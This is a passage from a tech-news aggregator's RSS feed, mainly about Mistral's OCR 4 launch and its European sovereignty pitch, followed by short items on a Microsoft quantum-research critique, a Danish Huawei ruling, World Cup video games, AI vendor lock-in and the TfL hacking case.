specific page. That traceability gap has been a persistent friction point for enterprises building retrieval-augmented generation (RAG) pipelines, compliance workflows, or any application where "where did this number come from?" is a question that needs an auditable answer.</p><p>Block classification addresses a related problem. A paragraph tagged as a "title" can segment a document into hierarchical chunks for semantic search. A block tagged as a "table" can be routed to a structured-data pipeline rather than a text summarizer. A block tagged as a "signature" can trigger a redaction workflow in a compliance system.</p><p>These are not novel ideas in isolation, but packaging them as first-class outputs of the OCR model itself — rather than requiring a separate layout-analysis stage — removes an integration layer that enterprise teams have historically had to build and maintain themselves.</p><p>The confidence scores serve a dual purpose. At scale, they allow organizations to programmatically route low-confidence regions to human reviewers and auto-approve high-confidence extractions, building what the industry calls human-in-the-loop verification without requiring a person to review every page of every document. In production systems, OCR is rarely the end goal — it is the first step in a larger pipeline.</p><p>Developers building RAG systems, agent workflows, or document automation often spend more time reconstructing layout and structure than on the downstream AI logic itself. OCR 4 aims to eliminate that reconstruction step, and if it delivers on that promise, the value accrues not just in OCR cost savings but in reduced engineering hours across the entire document pipeline.</p><h2><b>Independent reviewers preferred Mistral's output 72 percent of the time, but benchmarks tell a complicated story</b></h2><p>Mistral reports that <a href="https://mistral.ai/news/ocr-4/">OCR 4</a> achieved a 72% average win rate in a head-to-head human evaluation against leading competitors, conducted by independent annotators across more than 600 real-world documents in over 12 languages. The model also achieved the top overall score on <a href="https://huggingface.co/datasets/allenai/olmOCR-bench">OlmOCRBench</a> at 85.20 and scored 93.07 on <a href="https://github.com/opendatalab/OmniDocBench">OmniDocBench</a>.</p><p>But the company itself urges caution in interpreting those numbers. In its release, Mistral took the unusual step of auditing and publicly disclosing the specific types of scoring artifacts it encountered, including ground-truth errors in the reference annotations, equivalent LaTeX notation scored as mismatches, column-reading-order assumptions, and header/footer attribution issues. "We therefore treat the aggregate score as directional rather than definitive," the company said — a notably transparent stance from a vendor announcing a product.</p><p>That transparency is well-timed. On the public <a href="https://huggingface.co/datasets/allenai/olmOCR-bench">OlmOCRBench leaderboard</a>, some researchers have noted that OCR 4 currently ranks third, behind open models like Chandra OCR 2. And some open-weight models self-report higher OmniDocBench composite scores — <a href="https://huggingface.co/PaddlePaddle/PaddleOCR-VL-1.6">PaddleOCR-VL-1.6</a> claims 96.33 — though those results have not been independently reproduced on the public leaderboard.</p><p>Early enterprise feedback has been favorable nonetheless. Aidan Donohue, an AI engineer at financial AI firm Rogo, said the company benchmarked OCR 4 against leading agentic document parsers on a chart-dense financial QA dataset and "reached equivalent accuracy at roughly 8x lower cost and 17x lower latency." Ivan Mihailov, an AI engineer at intellectual property management firm Anaqua, said OCR 4 is "roughly 4x faster per page than our incumbent provider." </p><p>Enterprise buyers, however, should run their own evaluations rather than relying on any vendor's benchmark numbers. The practical question is not which model scores highest on a leaderboard, but which model produces the fewest errors on your specific documents, in your specific languages, at a price and latency that fit your workflow.</p><h2><b>The Anthropic export ban gave Mistral's sovereignty pitch the proof point it needed</b></h2><p>Mistral's release lands in a geopolitical context that could hardly be more favorable for its strategic positioning.</p><p>On June 12, <a href="https://www.anthropic.com/news/fable-mythos-access">Anthropic was forced to disable all access to its newest AI models</a>, Fable 5 and Mythos 5, after the U.S. Commerce Department used national security export controls to bar the company from distributing the models to any foreign national. Enterprise clients in finance, healthcare, SaaS, and critical infrastructure found their core intelligence services abruptly disabled, without prior warning or effective recourse. As of June 24, both models remain offline, with <a href="https://kalshi.com/markets/kxfablerestore/fable-restored/kxfablerestore-27">prediction markets giving only 57% odds of restoration</a> before July 1.</p><p>That episode validated a warning Mistral CEO Arthur Mensch has been sounding for over a year. As Business Insider reported, <a href="https://www.businessinsider.com/anthropic-model-access-mistral-opportunity-ai-sovereignty-2026-6">Mensch warned at London Tech Week</a> in June 2025 about American AI companies "having the keys" for their models, calling it a scenario where European companies are "giving leverage to their providers." He added: "At some point, you need to be able to turn it off or turn it on, and you don't want to leave it to another country."</p><p>The argument gained further urgency as Mensch's broader sovereignty pitch escalated in recent months. As reported by CNBC in late May, <a href="https://www.cnbc.com/2026/05/28/mistral-arthur-mensch-design-chips-ai-data-centers.html">Mensch told the outlet</a>: "Europe is lagging behind when it comes to [the] buildout of infrastructure, and so we are investing to close that gap." </p><p>At the same time, <a href="https://www.reuters.com/business/media-telecom/mistral-defends-ai-use-warfare-rebuts-pope-criticism-2026-05-28/">Mensch pushed back against Pope Leo XIV's call for AI to be "disarmed,"</a> arguing that Europe cannot afford to fall behind U.S. tech giants. "We're all for ​peace, but if you look at our rivals and adversaries in the world, they're using artificial ​intelligence … we do need to have our own capabilities," Mensch told reporters.</p><p>OCR 4's single-container, self-hosted deployment model is the product-level expression of that argument. A U.S.-headquartered provider offering EU data residency means documents are stored in Frankfurt but governed by U.S. law. Mistral, incorporated in France and operating under EU jurisdiction, offering on-premise containerized deployment, means documents never leave the customer's infrastructure at all. The <a href="https://artificialintelligenceact.eu/article/99/">EU AI Act's fine enforcement provisions</a> take effect August 2, adding regulatory pressure to the compliance calculus for European enterprises evaluating document AI vendors.</p><h2><b>Baidu's free, open-weight OCR model arrived one day earlier — and the contrast is revealing</b></h2><p>Mistral's release did not arrive in isolation. Just one day before <a href="https://mistral.ai/news/ocr-4/">OCR 4</a> launched, Baidu shipped <a href="https://huggingface.co/baidu/Unlimited-OCR">Unlimited-OCR</a> on June 22 — a 3-billion-parameter MIT-licensed model that tackles one of the most persistent pain points in document AI: parsing entire PDFs and multi-page scans in a single forward pass, without chunking the input or stitching the output back together afterward.</p><p>Baidu's model uses a technique called <a href="https://arxiv.org/html/2606.23050v1">Reference Sliding Window Attention (R-SWA)</a> that, as a top <a href="https://news.ycombinator.com/item?id=48643426">Hacker News commenter explained</a>, splits the AI's focus into two paths: maintaining full attention on the original document image while restricting memory of generated text to a tight, moving window. The result is constant KV cache size and the ability to transcribe 40-plus pages in a single forward pass. The model gathered <a href="https://github.com/baidu/Unlimited-OCR">1,800 GitHub stars</a> in its first 24 hours and racked up more than <a href="https://news.ycombinator.com/item?id=48643426">479 upvotes on Hacker News</a>, where the discussion thread ran to 109 comments.</p><p>The two releases frame what some analysts are calling the June 2026 document-AI split: self-hosted long-horizon parsing with open weights versus structured managed extraction with enterprise features.</p><p><a href="https://github.com/baidu/Unlimited-OCR">Baidu's model</a> is free under an MIT license, runs on standard GPU hardware, and has no managed API or enterprise SLA. <a href="https://mistral.ai/news/ocr-4/">Mistral's model</a> is a commercial product with per-page pricing, bounding boxes, confidence scores, block classification, multi-platform distribution, and self-hosted deployment options for enterprise customers. </p><p><a href="https://huggingface.co/baidu/Unlimited-OCR">Unlimited-OCR</a> may be the better tool for a research team digitizing scanned dissertations on a single GPU. <a href="https://mistral.ai/news/ocr-4/">OCR 4</a> is built for the IT procurement process — the world of SLAs, data processing agreements, and compliance audits.</p><p>Beyond Baidu, the broader OCR competitive field includes <a href="https://cloud.google.com/document-ai">Google Document AI</a>, <a href="https://aws.amazon.com/textract/">Amazon Textract</a>, <a href="https://azure.microsoft.com/en-us/products/ai-foundry/tools/document-intelligence">Azure Document Intelligence</a>, <a href="https://www.abbyy.com/vantage/">ABBYY Vantage</a>, and a growing number of open-weight models. </p><p>On the <a href="https://news.ycombinator.com/item?id=48643426">Hacker News thread</a> for Unlimited-OCR, practitioners offered a candid assessment of the state of the art. Joss82, who has worked on document parsing for 10 years, wrote bluntly: "OCR still sucks in 2026." Meanwhile, one user named SyneRyder reported success with Claude for OCR of hundreds of pages of handwritten documents, noting the model delivered results with "no corrections required" and even pointed out a continuity error in the source text. These practitioner reports underscore a key tension in the market: performance varies wildly depending on the specific document type, language, and quality of the source material.</p><h2><b>The real play is not OCR — it is an enterprise AI stack with document intelligence as the on-ramp</b></h2><p>Step back far enough, and <a href="https://mistral.ai/news/ocr-4/">Mistral's OCR 4 release</a> is not really an OCR story. It is an enterprise go-to-market story built on top of a $4.4 billion global intelligent document processing market that is forecast to grow at a 33.1% compound annual growth rate through 2030, according to <a href="https://www.grandviewresearch.com/industry-analysis/intelligent-document-processing-market-report">Grand View Research</a>.</p><p>For Mistral, OCR is a wedge into enterprise AI budgets. The model feeds directly into Mistral's <a href="https://mistral.ai/news/search-toolkit/">Search Toolkit</a>, the company's open-source composable search framework announced at the AI Now Summit. In that architecture, <a href="https://mistral.ai/news/ocr-4/">OCR 4</a> serves as the ingestion layer for retrieval-augmented generation and enterprise search pipelines, converting raw documents into citation-ready, structurally classified input. The logic is clear: once an enterprise adopts OCR 4 for document extraction, Mistral's broader model suite — including Medium 3.5 for reasoning and the Vibe agentic platform for task execution — becomes the natural next step in the stack. </p><p>That pipeline ambition is critical context for understanding Mistral's current fundraising trajectory. Bloomberg recently reported that the company is in early discussions to <a href="https://www.bloomberg.com/news/articles/2026-06-12/france-s-mistral-in-funding-talks-at-about-20-billion-valuation">raise about €3 billion ($3.5 billion)</a> at a valuation of roughly €20 billion — nearly double the €11.7 billion valuation from its September Series C round. To date, Mistral has raised only about $4 billion, a fraction of what its largest U.S. rivals have taken in. OCR 4 and its associated enterprise revenue pipeline are part of how the company plans to justify that higher valuation, with Mistral targeting <a href="https://www.lemonde.fr/en/economy/article/2026/01/22/french-ai-firm-mistral-predicts-revenue-of-1-billion-in-2026_6749706_19.htm">€1 billion in revenue</a> for 2026, up from €200 million in 2025, according to Le Monde.</p><p>Mistral is a company with roughly 1,000 employees and ambitions to compete with labs that have raised 40 times as much capital. It cannot win a general-purpose model arms race against OpenAI and Anthropic. What it can do is build a differentiated enterprise stack around sovereignty, <a href="https://mistral.ai/news/ocr-4/">structured document intelligence</a>, and agentic workflows — and use that stack to capture European enterprise budgets that are increasingly wary of U.S. provider dependency. </p><p>The pricing structure reinforces that strategy: at $2 per 1,000 pages in batch mode, the cost of processing a 100,000-page corporate archive falls to $200, making large-scale digitization projects economically viable in ways they may not have been with token-based vision-language model pricing.</p><p>Whether Mistral can execute that vision at scale — against Google, Amazon, Microsoft, and a surging open-source ecosystem — remains an open question. But the Anthropic export control crisis is still unresolved, European data sovereignty regulations are tightening, and a potential €20 billion funding round is on the horizon. The company is holding an <a href="https://learn.mistral.ai/public/events/ocr4-webinar">OCR 4 production webinar on July 7 at 6:00 PM CET</a>.</p><p>Two weeks ago, the argument for building AI infrastructure outside the reach of U.S. export controls was theoretical. Then the U.S. government flipped a switch, and Anthropic's most advanced models went dark for every non-American on the planet. Mistral did not cause that crisis — but it spent the last year building the product that makes it matter.</p><p>
</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[A General Many Hoped Would Lead the Army Is Forced to Step Aside]]></title>
<description><![CDATA[Gen. Christopher T. Donahue was seen as a rising star in the Army. But Defense Secretary Pete Hegseth viewed him with skepticism.]]></description>
<link>https://tsecurity.de/de/3622697/ai-nachrichten/a-general-many-hoped-would-lead-the-army-is-forced-to-step-aside/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3622697/ai-nachrichten/a-general-many-hoped-would-lead-the-army-is-forced-to-step-aside/</guid>
<pubDate>Wed, 24 Jun 2026 22:03:41 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Gen. Christopher T. Donahue was seen as a rising star in the Army. But Defense Secretary Pete Hegseth viewed him with skepticism.]]></content:encoded>
</item>
<item>
<title><![CDATA[Boffin Claims Microsoft's 'Quantum Leap' Is Invalid Due To 'Basic Python Errors']]></title>
<description><![CDATA[A peer-reviewed Nature critique argues that Microsoft's 2025 Majorana quantum-computing breakthrough -- and its claim that it could enable "a truly meaningful quantum computer not in decades, as some have predicted, but in years" -- is fundamentally flawed. According to Dr Henry Legg, a lecturer ...]]></description>
<link>https://tsecurity.de/de/3622239/it-security-nachrichten/boffin-claims-microsofts-quantum-leap-is-invalid-due-to-basic-python-errors/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3622239/it-security-nachrichten/boffin-claims-microsofts-quantum-leap-is-invalid-due-to-basic-python-errors/</guid>
<pubDate>Wed, 24 Jun 2026 19:09:13 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A peer-reviewed Nature critique argues that Microsoft's 2025 Majorana quantum-computing breakthrough -- and its claim that it could enable "a truly meaningful quantum computer not in decades, as some have predicted, but in years" -- is fundamentally flawed. According to Dr Henry Legg, a lecturer at the University of St Andrews, the claims were undermined by omitted data, selective plotting, and basic Python errors that concealed alternative results. Microsoft, for its part, says the bugs were minor and stands by its findings and roadmap. The Register reports: "Last year they claimed to be years, not decades from a 'topological quantum supercomputer,'" Legg told The Register in an email. "My feeling is that they are centuries, not decades away. If it works at all -- and, based on what I have seen, the most likely scenario is that it doesn't work." Based on his analysis of the research Microsoft published in 2025, Legg argues that the company's claims about finding and being able to control the elusive Majorana particle to build a topological superconductor do not withstand scrutiny.
 
"I demonstrate that Microsoft's tune-up software is flawed and that coding errors resulted in incorrect statements to peer reviewers," said Legg. "Raw data, which was omitted from the original paper, also appears to indicate Microsoft's devices contain considerable disorder and are not compatible with the existence of a topological gap. In other words, the prerequisites for Microsoft's claims do not appear to be met, but this was obscured because this data did not appear in the original publication."
 
Essentially, Microsoft has proposed a Topological Gap Protocol (TGP) that can be used to detect the phase transition deemed to be a prerequisite for conducting quantum calculations using Majorana particles. Legg argues that based on his analysis of underlying transport data (measurements of particle change) -- omitted from the original publication -- Microsoft chose to focus on results that supported its thesis and ignored data that could be interpreted as a negative result. As he notes in his critique: "The TGP plotting code was set to highlight only the largest purportedly topological region."
 
"The primary consequence was the omission of other regions that passed their tune-up protocol (the TGP)," said Legg. "When peer reviewers asked if other regions existed, Microsoft inaccurately stated that they had investigated the only region passing the protocol within the explored range. This was not correct." Legg also argues that Microsoft mishandled its code. "The code antisymmetrized bias voltage based on array index rather than physical value," his analysis says.
 
In other words, Microsoft's researchers made a basic programming mistake by evaluating the array index -- the number identifying a value's position in an array -- instead of the value to which the index refers. "There were two pretty basic Python programming errors that hid these alternative regions," Legg explained. "Their plotting software was hardcoded with a filter (zbp_cluster_numbers=[1]) that forced it to display only the single largest region, concealing other successful results from their phase maps. Changing this to zbp_cluster_numbers=[1,2] shows already a second region." Legg added: "The TGP software transformed the data by simply reversing a Python array (x[::-1]) based on its index position, ignoring the actual physical bias voltages."<p></p><div class="share_submission">
<a class="slashpop" href="http://twitter.com/home?status=Boffin+Claims+Microsoft's+'Quantum+Leap'+Is+Invalid+Due+To+'Basic+Python+Errors'%3A+https%3A%2F%2Fdevelopers.slashdot.org%2Fstory%2F26%2F06%2F24%2F1644216%2F%3Futm_source%3Dtwitter%26utm_medium%3Dtwitter"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a class="slashpop" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Fdevelopers.slashdot.org%2Fstory%2F26%2F06%2F24%2F1644216%2Fboffin-claims-microsofts-quantum-leap-is-invalid-due-to-basic-python-errors%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>



</div><p><a href="https://developers.slashdot.org/story/26/06/24/1644216/boffin-claims-microsofts-quantum-leap-is-invalid-due-to-basic-python-errors?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Denmark must pay telecoms firm US$12m for Huawei equipment removal: court]]></title>
<description><![CDATA[A Danish court has ordered the state to pay 80 million Danish kroner (US$12 million) in compensation to TDC NET, the country’s largest digital-infrastructure operator, after authorities forced it to strip Huawei equipment from its fibre network.
The Eastern High Court in Copenhagen ruled on Wedne...]]></description>
<link>https://tsecurity.de/de/3622027/it-security-nachrichten/denmark-must-pay-telecoms-firm-us12m-for-huawei-equipment-removal-court/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3622027/it-security-nachrichten/denmark-must-pay-telecoms-firm-us12m-for-huawei-equipment-removal-court/</guid>
<pubDate>Wed, 24 Jun 2026 17:52:45 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A Danish court has ordered the state to pay 80 million Danish kroner (US$12 million) in compensation to TDC NET, the country’s largest digital-infrastructure operator, after authorities forced it to strip Huawei equipment from its fibre network.
The Eastern High Court in Copenhagen ruled on Wednesday that a 2023 order by the Centre for Cybersecurity directing TDC NET to remove Huawei gear from its dense wavelength-division multiplexing (DWDM) network – a technology used to expand the capacity of...]]></content:encoded>
</item>
<item>
<title><![CDATA[The history of brilliantly terrible World Cup video games]]></title>
<description><![CDATA[As football fans revel in the real world tournament, its digital counterparts continue to stumble in capturing the ​hyped up ​atmosphereDon’t get Pushing Buttons delivered to your inbox? Sign up hereI come with a warning to all football fans: if you’ve been enjoying the World Cup enough to think,...]]></description>
<link>https://tsecurity.de/de/3621673/it-nachrichten/the-history-of-brilliantly-terrible-world-cup-video-games/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3621673/it-nachrichten/the-history-of-brilliantly-terrible-world-cup-video-games/</guid>
<pubDate>Wed, 24 Jun 2026 16:18:12 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>As football fans revel in the real world tournament, its digital counterparts continue to stumble in capturing the ​hyped up ​atmosphere</p><ul><li><p><a href="https://www.theguardian.com/info/ng-interactive/2021/nov/24/sign-up-for-pushing-buttons-keza-macdonalds-weekly-look-at-the-world-of-gaming"><strong>Don’t get Pushing Buttons delivered to your inbox? Sign up here</strong></a></p></li></ul><p>I come with a warning to all football fans: if you’ve been enjoying the World Cup enough to think, “I’d like to re-enact this on a football video game”, do not go to Netflix and play Fifa World Cup: Launch Edition, the officially licensed game of the tournament, which streams via your smart TV or computer. Developed by the virtually unknown Delphi Interactive, it’s a juddering, dated calamity, with sluggish controls (via your phone, once you’ve downloaded the app) and commentary courtesy of Clive Tyldesley that delivers all the excitement of a robotic train station announcement.</p><p>Until this, it was largely agreed that the worst World Cup football game in history was World Cup Carnival, the first official Fifa tie-in, which was released on various home computers in 1986. Publisher US Gold thought it had a deal with the Manchester studio Ocean Software to repurpose its acclaimed title Match Day, but the agreement fell through. With three months to go before Mexico 86, US Gold was forced to effectively rebadge a dire 1984 sim, World Cup Football, by the fading developer Artic. To add some value to the package, the game was released in a fancy big box complete with a fixtures chart, a World Cup facts poster and some flag stickers. Nobody was fooled – the World Cup Carnival was a critical and commercial disaster.</p> <a href="https://www.theguardian.com/games/2026/jun/23/the-long-painful-history-of-terrible-world-cup-video-games">Continue reading...</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[Choosing your AI stack: The benefits of vendor lock-in]]></title>
<description><![CDATA[AI has emerged as a top priority for businesses and a vehicle for transformation, as evidenced by Accenture research: 97% of executives believe AI will transform their company and industry. But as companies move from AI pilots to scaling AI across the enterprise, we have had repeated conversation...]]></description>
<link>https://tsecurity.de/de/3620900/it-nachrichten/choosing-your-ai-stack-the-benefits-of-vendor-lock-in/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3620900/it-nachrichten/choosing-your-ai-stack-the-benefits-of-vendor-lock-in/</guid>
<pubDate>Wed, 24 Jun 2026 12:03:49 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>AI has emerged as a top priority for businesses and a vehicle for transformation, as evidenced by <a href="https://www.accenture.com/us-en/insights/consulting/gen-ai-reinventing-enterprise-models" rel="nofollow">Accenture research</a>: 97% of executives believe AI will transform their company and industry. But as companies move from AI pilots to scaling AI across the enterprise, we have had repeated conversations with CIOs and technology leaders who are arriving at the same uncomfortable realization: AI stack decisions are not easily reversible.</p>



<p>Unlike earlier eras of enterprise IT, where abstraction layers insulated applications from hardware choices, today’s AI stack—the infrastructure, technologies and frameworks that powers AI systems – tends  to be tightly co-engineered, with stronger dependencies in the underlying compute layers. Choices made about models, runtimes and compute platforms now shape cost structures, performance ceilings and strategic flexibility. <a href="https://www.accenture.com/content/dam/accenture/final/a-com-migration/pdf/pdf-171/accenture-ever-ready-infrastructure.pdf#zoom=40" rel="nofollow">AI-ready infrastructure</a> has re-emerged as a new source of differentiation, and with it, a new kind of vendor lock-in.</p>



<p>At the center of this shift is the move from training – building AI models – to inference, where those models are used in production to generate outputs from new data. While early attention focused on the cost of training large models, enterprises are now scaling AI across the organization, running models continuously across workflows. This shift significantly changes the economics of AI.</p>



<p>For instance, <a href="https://www.accenture.com/content/dam/accenture/final/accenture-com/document-4/Accenture-The-New-Rules-of-Platform-Strategy-in-the-Age-of-Agentic-AI.pdf#zoom=40" rel="nofollow">agentic AI is reshaping infrastructure architecture and platforms</a> because inference is becoming persistent, stateful and increasingly data intensive. As AI Factories scale, the focus is shifting from peak model performance toward sustainable token economics, where the key differentiators are lowest cost per generated token, power efficiency and infrastructure utilization at scale. In this environment, achieving those outcomes requires full-stack optimization across compute, networking, memory, storage and data fabrics, curated and integrated across ecosystem partners. Secure multitenancy and confidential computing are becoming core design principles, and enterprise AI is now ready to be industrialized at scale.</p>



<h2 class="wp-block-heading">Modern AI infrastructure is a strategic bet</h2>



<p>What makes AI infrastructure different is not just scale, but integration. <a href="https://www.cio.com/article/4176051/8-it-modernization-traps-cios-must-avoid.html?utm=hybrid_search">Modern AI systems</a> are built on tightly co-engineered stacks where GPU accelerators, high-bandwidth interconnects, compilers and runtimes are designed in tandem to maximize throughput and efficiency for AI workloads.</p>



<p>To get the massive computing power required for AI, providers design their hardware and software to work exclusively with one another. This has shifted enterprise decision-making from choosing hardware one piece at a time to committing to ecosystems. And that commitment carries consequences.</p>



<p>In traditional IT environments, applications could also generally move across environments with a manageable amount of effort. In AI systems, that assumption breaks down. What appears portable at the model or application layer often depends on deeply optimized components underneath that layer, such as memory handling and compiler frameworks like CUDA or ROCm that are fine-tuned to specific hardware.</p>



<p>We find it useful to think about AI systems as a layered structure:</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/06/ai-systems-as-a-layered-structure.png?w=1024" alt="A visualization of AI systems as a layered structure." class="wp-image-4188504" width="1024" height="610" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Accenture</p></div>



<p>While upper layers retain some flexibility, dependencies increase as you move downward. Changing your foundational AI provider often means having to rebuild and re-optimize large portions of your technology from scratch.</p>



<p>This is why infrastructure decisions in AI feel less like procurement choices and more like strategic, high-stakes bets.</p>



<h2 class="wp-block-heading">Why switching AI platforms is harder than it looks</h2>



<p>In theory, switching platforms should be straightforward. Models can be retrained, applications rewritten, and infrastructure replaced. In reality, the cost of switching extends far beyond hardware or licensing.</p>



<ul class="wp-block-list">
<li>The first challenge is <strong>engineering effort</strong>. Migrating to different platforms requires engineers to revalidate model behavior, re-tune inference pipelines, and rebuild performance baselines. During this period, teams spend most of their time stabilizing and not innovating.</li>



<li>The second challenge is <strong>hidden dependency</strong>. Over time, system optimization becomes tied to a specific stack. This might include latency expectations, batching strategies, orchestration logic and even human workflows. These ties are not always obvious, but they shape how systems behave in production.</li>



<li>The third challenge is <strong>timing</strong>. There is never a convenient time to migrate, especially factoring in rising AI infrastructure and inference costs, competitive pressure or scaling demands. Organizations are often forced to switch platforms precisely when disruption is hardest to absorb.</li>
</ul>



<h2 class="wp-block-heading">Rethinking performance vs control</h2>



<p>Despite these barriers, organizations do switch. In our experience, this typically happens under three conditions.</p>



<p>One common trigger is when the opportunity cost of staying begins to outweigh the cost of leaving. As performance gaps widen across competing ecosystems, inefficiencies accumulate to the point that remaining on the current platform is no longer viable. Another driver comes from shifts in vendor dynamics. Pricing volatility, supply constraints, or misalignment in product roadmaps can introduce risks that force a re-evaluation. Finally, regulatory requirements, data sovereignty constraints or geopolitical shifts can force platform changes regardless of technical preference.</p>



<p>Across all three strategies, one principle stands out. Lock-in is not inherently negative, and openness is not inherently superior. Timing matters more than ideology.</p>



<p>Given these dynamics, the central question for CIOs is not how to avoid lock-in, but how to manage it deliberately. This represents a significant shift in strategies that previously considered vendor lock-in as a detriment. In practice, we see three broad approaches emerge, each reflecting a different balance between performance and control.</p>



<p>Some organizations take a performance-first approach. They optimize deeply within a specific ecosystem because performance directly drives business outcomes. <a href="https://blogs.nvidia.com/blog/lilly-ai-factory-nvidia-blackwell-dgx-superpod/" rel="nofollow">Eli Lilly’s AI Factory</a> is a strong example. The company has invested heavily in a tightly integrated NVIDIA-based stack to maximize throughput and utilization. In this case, infrastructure is a competitive lever and not merely a support function. Higher switching costs are accepted because near-term performance advantages are decisive.</p>



<p>Others lean toward a portability-first model. These organizations prioritize flexibility, governance, and long-term independence over absolute performance. <a href="https://group.bnpparibas/en/press-release/bnp-paribas-provides-its-businesses-with-an-llm-as-a-service-platform-to-accelerate-the-industrialization-of-generative-ai-use-cases" rel="nofollow">BNP Paribas</a> illustrates this well through its internal LLM platform built on open-source models and controlled infrastructure. By retaining ownership of the stack, the bank ensures data sovereignty, regulatory alignment and predictable cost.</p>



<p>A growing number are adopting a hybrid approach. Rather than applying a single strategy across the enterprise, they segment workloads based on sensitivity to performance, cost and governance. For example, in late 2024, <a href="https://www.cio.com/article/3616622/jpmorgan-chase-builds-ambitious-ai-foundation-on-aws.html?utm_source=chatgpt.com">JPMorganChase</a> outlined its approach at a leading cloud and technology conference. It described combining a firm-wide internal AI platform with cloud-based services to move generative AI into production at scale. This reflects a broader enterprise pattern of pairing internally controlled environments with external ecosystems to balance control, scalability and cost.</p>



<p>A performance advantage is only valuable if it lasts long enough to justify the lock-in it creates. Similarly, portability only matters if the ecosystem evolves in ways that make switching worthwhile. This is where many organizations struggle. They evaluate platforms based on current benchmarks rather than the direction of the ecosystem.</p>



<p>In practice, we encourage leaders to track a set of evolving signals. These range from the maturity of open compiler ecosystems and improvements in cross-platform runtimes, to shifts in performance per watt and increasing regulatory focus on sovereign AI. Together, these indicators help determine whether the industry is moving toward convergence or further fragmentation.</p>



<h2 class="wp-block-heading">Conclusion</h2>



<p>AI is forcing a reset in how technology leaders think about IT architecture. The goal for CIOs is no longer to eliminate dependency, but to choose it consciously and manage and revisit that choice over time.</p>



<p>In our experience, the most effective organizations treat this as a dynamic problem. They evaluate where performance truly differentiates them, where flexibility protects them, and how quickly those boundaries are shifting. They also recognize that some degree of re-platforming is inevitable and plan for it, rather than treating it as a failure.</p>



<p>Ultimately, AI infrastructure strategy is not about optimizing for today’s conditions. It is about getting ready for where the ecosystem is going next. The leaders who navigate this well are not those who avoid lock-in entirely, but those who understand when to embrace it when to limit it and when to move beyond it before the market forces that decision on them.</p>



<p><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><strong><a href="https://www.cio.com/expert-contributor-network/">Want to join?</a></strong></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[TfL Hackers Plead Guilty After Breach Exposed Customer Data and Cost £29 Million]]></title>
<description><![CDATA[Two alleged members of the cybercrime collective Scattered Spider have pleaded guilty to their roles in the Transport for London cyberattack, an incident that disrupted services, exposed customer data, and resulted in approximately £29 million in losses and recovery costs for London's transport a...]]></description>
<link>https://tsecurity.de/de/3620296/it-security-nachrichten/tfl-hackers-plead-guilty-after-breach-exposed-customer-data-and-cost-29-million/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3620296/it-security-nachrichten/tfl-hackers-plead-guilty-after-breach-exposed-customer-data-and-cost-29-million/</guid>
<pubDate>Wed, 24 Jun 2026 07:38:19 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1536" height="1024" src="https://thecyberexpress.com/wp-content/uploads/Transport-for-London-cyberattack.webp" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="Transport for London cyberattack" decoding="async" srcset="https://thecyberexpress.com/wp-content/uploads/Transport-for-London-cyberattack.webp 1536w, https://thecyberexpress.com/wp-content/uploads/Transport-for-London-cyberattack-300x200.webp 300w, https://thecyberexpress.com/wp-content/uploads/Transport-for-London-cyberattack-1024x683.webp 1024w, https://thecyberexpress.com/wp-content/uploads/Transport-for-London-cyberattack-768x512.webp 768w, https://thecyberexpress.com/wp-content/uploads/Transport-for-London-cyberattack-600x400.webp 600w, https://thecyberexpress.com/wp-content/uploads/Transport-for-London-cyberattack-150x100.webp 150w, https://thecyberexpress.com/wp-content/uploads/Transport-for-London-cyberattack-750x500.webp 750w, https://thecyberexpress.com/wp-content/uploads/Transport-for-London-cyberattack-1140x760.webp 1140w, https://thecyberexpress.com/wp-content/uploads/Transport-for-London-cyberattack.webp 1536w, https://thecyberexpress.com/wp-content/uploads/Transport-for-London-cyberattack-300x200.webp 300w, https://thecyberexpress.com/wp-content/uploads/Transport-for-London-cyberattack-1024x683.webp 1024w, https://thecyberexpress.com/wp-content/uploads/Transport-for-London-cyberattack-768x512.webp 768w, https://thecyberexpress.com/wp-content/uploads/Transport-for-London-cyberattack-600x400.webp 600w, https://thecyberexpress.com/wp-content/uploads/Transport-for-London-cyberattack-150x100.webp 150w, https://thecyberexpress.com/wp-content/uploads/Transport-for-London-cyberattack-750x500.webp 750w, https://thecyberexpress.com/wp-content/uploads/Transport-for-London-cyberattack-1140x760.webp 1140w" sizes="(max-width: 1536px) 100vw, 1536px" title="TfL Hackers Plead Guilty After Breach Exposed Customer Data and Cost £29 Million 1"></p>Two alleged members of the cybercrime collective <a 